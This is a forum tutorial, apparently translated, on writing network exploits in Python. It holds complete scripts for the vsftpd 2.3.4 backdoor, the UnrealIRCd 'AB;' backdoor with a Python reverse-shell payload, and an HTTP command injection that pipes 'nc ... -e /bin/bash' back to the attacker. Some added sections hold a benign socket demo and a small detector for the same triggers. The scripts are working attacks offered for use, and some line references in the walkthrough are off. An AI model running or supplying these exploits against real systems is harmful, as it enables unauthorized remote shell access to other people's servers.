How to Write an Exploit with Python?

Provido

Participating Member
21 Oct 2015
Hello again with a long topic.

Today I will try to explain how to write a network-based exploit with Python.

I will use three different vulnerabilities as examples.

Let's move on if you want.

If we want to write a network-based exploit, we first need to know network programming.

In Python, network programming is done with the socket module.

The main constants and methods of the socket module:


Code:
socket.AF_INET   : Makes the connection over IPv4.
socket.AF_INET6  : Makes the connection over IPv6.
socket.SOCK_STREAM  : Uses the TCP protocol for the connection.
socket.SOCK_DGRAM  : Uses the UDP protocol for the connection.

socket.connect((h,p))  : Connects to the specified IP address and port. (Client)
socket.bind((h,p))  : Binds the specified IP address and port for listening. (Server)
socket.listen()  : Sets how many pending connections may queue on the listening address.
socket.accept()  : Accepts a client that wants to connect.
socket.send()  : Sends data to the connected peer.
socket.recv()  : Receives the reply that comes over the connection.


With these calls, a basic connection can be established and data exchanged.

They are already sufficient for the very basic exploits written here.
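As an added illustration of the calls listed above (my own Python 3 code, not from the original post), here is a complete loopback exchange: a server that binds, listens and accepts one client, and a client that connects, reads the greeting first and then sends one line. The banner text, the message and the loopback port (chosen by the OS) are constructed for the demo.

```python
import socket
import threading

BANNER = b"220 demo service ready\r\n"   # constructed banner, not a real server's


def serve_one(srv, result):
    """Server side: accept one client, greet it, read one line, answer it."""
    # accept() returns a (connection, address) pair; you send()/recv() on the
    # connection, while the original socket stays a listener.
    conn, addr = srv.accept()
    with conn:
        conn.sendall(BANNER)
        request = conn.recv(1024).strip()
        result["request"] = request
        result["peer"] = addr[0]
        conn.sendall(b"200 got " + request + b"\r\n")


def run_exchange(message=b"HELLO demo\r\n"):
    """Run one client/server exchange on the loopback interface and return what each side saw."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)   # IPv4 + TCP
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))      # port 0: let the OS pick a free port
    srv.listen(1)                   # backlog of one pending connection
    port = srv.getsockname()[1]
    result = {}
    server = threading.Thread(target=serve_one, args=(srv, result))
    server.start()

    cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    cli.connect(("127.0.0.1", port))
    banner = cli.recv(1024).strip()   # read the greeting before sending anything
    cli.sendall(message)
    reply = cli.recv(1024).strip()
    cli.close()
    server.join()
    srv.close()
    result["banner"] = banner
    result["reply"] = reply
    return result


if __name__ == "__main__":
    print(run_exchange())
```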

vsftpd 2.3.4

There are two main reasons why I chose the vsftpd vulnerability:

1. It is the most common example, because the exploitation takes place on the target itself.

2. No handler is needed for the connection.


The vulnerability is exploited by appending the “:)” escape sequence (the smiley sent in the USER command of the listing below) to the answer given to the username question, which opens a shell on port 6200.

The code I wrote for this operation is:


Code:
01| from socket import *
02| import sys
03| 
04| aux = socket(AF_INET,SOCK_STREAM)
05| host = sys.argv[1]
06| port = int(sys.argv[2])
07| 
08| 
09| aux.connect((host,port))
10| head = aux.recv(1024).strip()
11| if "(vsFTPd 2.3.4)" in head:
12|     aux.send("USER something:)\n")
13|     aux.recv(1024)
14|     aux.send("PASS againsomething\n")
15|     aux.close()
16|     print "My man! This port has got a vull.\n"
17| else:
18|     print "Sorry dude:( This is a normal port\n"
19|     exit()
20| 
21|
22| exp = socket(AF_INET,SOCK_STREAM)
23| 
24| exp.connect((host,6200))
25| while True:
26|     com = raw_input("#")     
27|     if com == "exit":
28|         exp.close()
29|         exit()
30|     exp.send(com + "\n")
31|     print exp.recv(1024)


In the first two lines of the script, the socket and sys modules are imported.

Line 4 creates the socket for a connection over TCP and IPv4 and assigns it to the short variable name aux to keep the script brief.

Lines 5 and 6 take the desired host and port parameters from the user's command-line arguments.

Line 9 connects to the specified IP address and port. From now on, every call on the aux variable operates on this connection.

Lines 10, 11 and 17 check, by reading the banner, whether the connected port is running the vulnerable version.

Line 12 takes the first step of exploitation by sending the escape sequence inside the data.

Line 13 reads the packet that comes back so the exchange can continue.

Lines 14 and 15 add the final touch (the PASS command) and close the connection.

Line 22 creates a new socket, named exp, in the same way as line 4, so that the code stays readable.

Once the connection is made, line 25 opens a while loop that keeps running as long as the user does not exit.

Line 26 prompts the hacker for the data to be sent.

Line 28 provides a quick exit for convenience.

The data entered in line 32 is sent to the other party.

Line 33 receives the reply to the data that was sent, and the loop returns to line 26.

.:What our Hacker saw:.

[Screenshot: 1.png]

.:What is happening in the network:.

[Screenshot: 2.png]


Unreal IRC


I chose this vulnerability because it is an easy one, and also one for which we can use a handler when exploiting it.

To exploit the vulnerability, after receiving the packets the server sends us once the connection is complete, we send the response it expects from us prefixed with the “AB;” escape sequence, followed by the code we want to run.

I wrote the following script for this process:


Code:
01| from socket import *
02| import sys
03| 
04| thost, tport = sys.argv[1], int(sys.argv[2])
05| lhost = '"'+ sys.argv[3] +'"'
06| 
07| 
08| fir = socket(AF_INET,SOCK_STREAM)
09| 
10| fir.connect((thost,tport))
11| payload = """AB;python -c 'import socket,subprocess,os;pay=socket.socket(socket.AF_INET,socket.SOCK_STREAM);pay.connect((""" + lhost + """,4444));os.dup2(pay.fileno(),0); os.dup2(pay.fileno(),1); os.dup2(pay.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'""" 
12| fir.send(payload)
13| fir.recv(1024)
14| 
15| 
16| han = socket(AF_INET,SOCK_STREAM)
17| 
18| han.bind(("",4444))
19| han.listen(1)
20| fir.close()
21| cl = han.accept()
22| print cl.recv(1024)
23| while True:
24|     sh = cl.recv(1024)
25|     send = raw_input(sh)
26|     if send == "exit":
27|         han.close()
28|         exit()
29|     cl.send(send + "\n")
30|     data = cl.recv(1024)
31|     print data


The first part does the same as in the previous exploit.

Line 11 defines the payload to be sent after the connection is established. The payload is written in Python and its purpose is to connect back to the hacker's port 4444 with a shell. The “AB;” escape sequence appears at the very start of it.

The payload is sent on line 12.

Line 13 receives the reply packet so as not to break the server's heart, but it is not shown to the hacker.

Line 18 opens a listening port to catch the shell connection that the server will make back to us.

Line 19 sets the number of queued connections to 1.

Line 20 closes the first connection so that the previously sent payload can complete.

Line 21 assigns the next incoming connection to a variable named cl.

Line 23 starts a while loop that runs as long as the connection is up.

The rest is the same as the previous exploit.


.:What our Hacker saw:.

[Screenshot: 3.png]

.:What does Wireshark see?:.

[Screenshot: 4.png]


Command Injection

There are two reasons why I chose this vulnerability:

1. It is an HTTP-based vulnerability, and the exploit is written accordingly.

2. There are so many HTTP vulnerabilities, and because they all look alike, I picked this one out of laziness.


The vulnerable page works by asking you for data, running it on the command line and returning the output to you.
If you use the “|” character as the escape sequence, the command you type after it is executed.

I wrote the following script to make this process:


Code:
01| from socket import *
02| import sys
03| 
04| con = socket(AF_INET,SOCK_STREAM)
05| han = socket(AF_INET,SOCK_STREAM)
06| rhost, url, lhost = sys.argv[1], sys.argv[2], sys.argv[3]
07| 
08| con.connect((rhost,80))
09| payload = "GET "+ url +"|%20nc%20"+ lhost +"%204444%20-e%20/bin/bash HTTP/1.1\nHost: "+ rhost +"\n\n"
10| han.bind(("",4444))
11| han.listen(1)
12| con.send(payload)
13| 
14| cl = han.accept()
15| while True:
16|     send = raw_input("==>")
17|     cl.send(send + "\n")
18|     data = cl.recv(1024)
19|     print(data)


The first part does the same as the other exploits again.

Line 9 builds an HTTP request to the HTTP port. The request contains the command that performs the injection ( | nc [IP address] [port] -e /bin/bash ).

Lines 10-12 start listening and send the request containing the injected command.

The rest is the same as the other exploits.
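As an added example (my own Python 3 code, not from the original post), the following snippet takes the defender's view of the three triggers described in the vsftpd, Unreal IRC and command-injection sections: a FTP USER name containing “:)”, IRC data starting with “AB;”, and an HTTP URL whose decoded query chains a shell metacharacter into nc or a shell. The “<service> <client> <payload>” line format, the addresses and the sample lines are constructed for the demo; the regex goes a little beyond the post by catching ; & and backtick chaining as well as |.

```python
import re
from urllib.parse import unquote

# Constructed sample traffic, one decoded payload per line, in the form
# "<service> <client> <payload>". Lines 1, 3 and 5 mimic the three triggers
# the post describes; the others are benign.
SAMPLE_LINES = [
    "ftp 10.0.0.5 USER something:)",
    "ftp 10.0.0.6 USER alice",
    "irc 10.0.0.7 AB;python -c 'import socket,subprocess,os;...'",
    "irc 10.0.0.8 NICK bob",
    "http 10.0.0.9 GET /cgi/ping.cgi?host=127.0.0.1|%20nc%2010.0.0.1%204444%20-e%20/bin/bash HTTP/1.1",
    "http 10.0.0.10 GET /index.html HTTP/1.1",
]

# A shell metacharacter followed by a tool that opens a socket or a shell.
_SHELL_CHAIN = re.compile(r"[|;&`]\s*(nc|ncat|netcat|bash|sh|python|perl)\b")


def classify(line):
    """Return a verdict string for one sample line, or None if it looks benign."""
    service, _client, payload = line.split(" ", 2)
    if service == "ftp":
        # vsftpd 2.3.4 backdoor trigger: the smiley inside the USER name
        if payload.upper().startswith("USER ") and ":)" in payload[5:]:
            return "vsftpd-backdoor-trigger"
    elif service == "irc":
        # Unreal IRC backdoor trigger: first data sent starts with "AB;"
        if payload.startswith("AB;"):
            return "unrealircd-backdoor-trigger"
    elif service == "http":
        # Command injection: URL-decode first, then look for metachar + tool
        if _SHELL_CHAIN.search(unquote(payload)):
            return "http-command-injection"
    return None


def scan(lines):
    """Return (client, verdict) pairs for every suspicious line."""
    hits = []
    for line in lines:
        verdict = classify(line)
        if verdict:
            hits.append((line.split(" ", 2)[1], verdict))
    return hits
```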


.:What our Hacker saw:.

[Screenshot: 5.png]

.:What does Wireshark see?:.

[Screenshot: 6.png]


Thank you for reading this topic.

I have surely made mistakes; I'm not an expert in Python.

I wish you a good forum.




Source: https://www.turkhackteam.org/python/1727579-python-ile-exploit-yazmak.html

Translator: Provido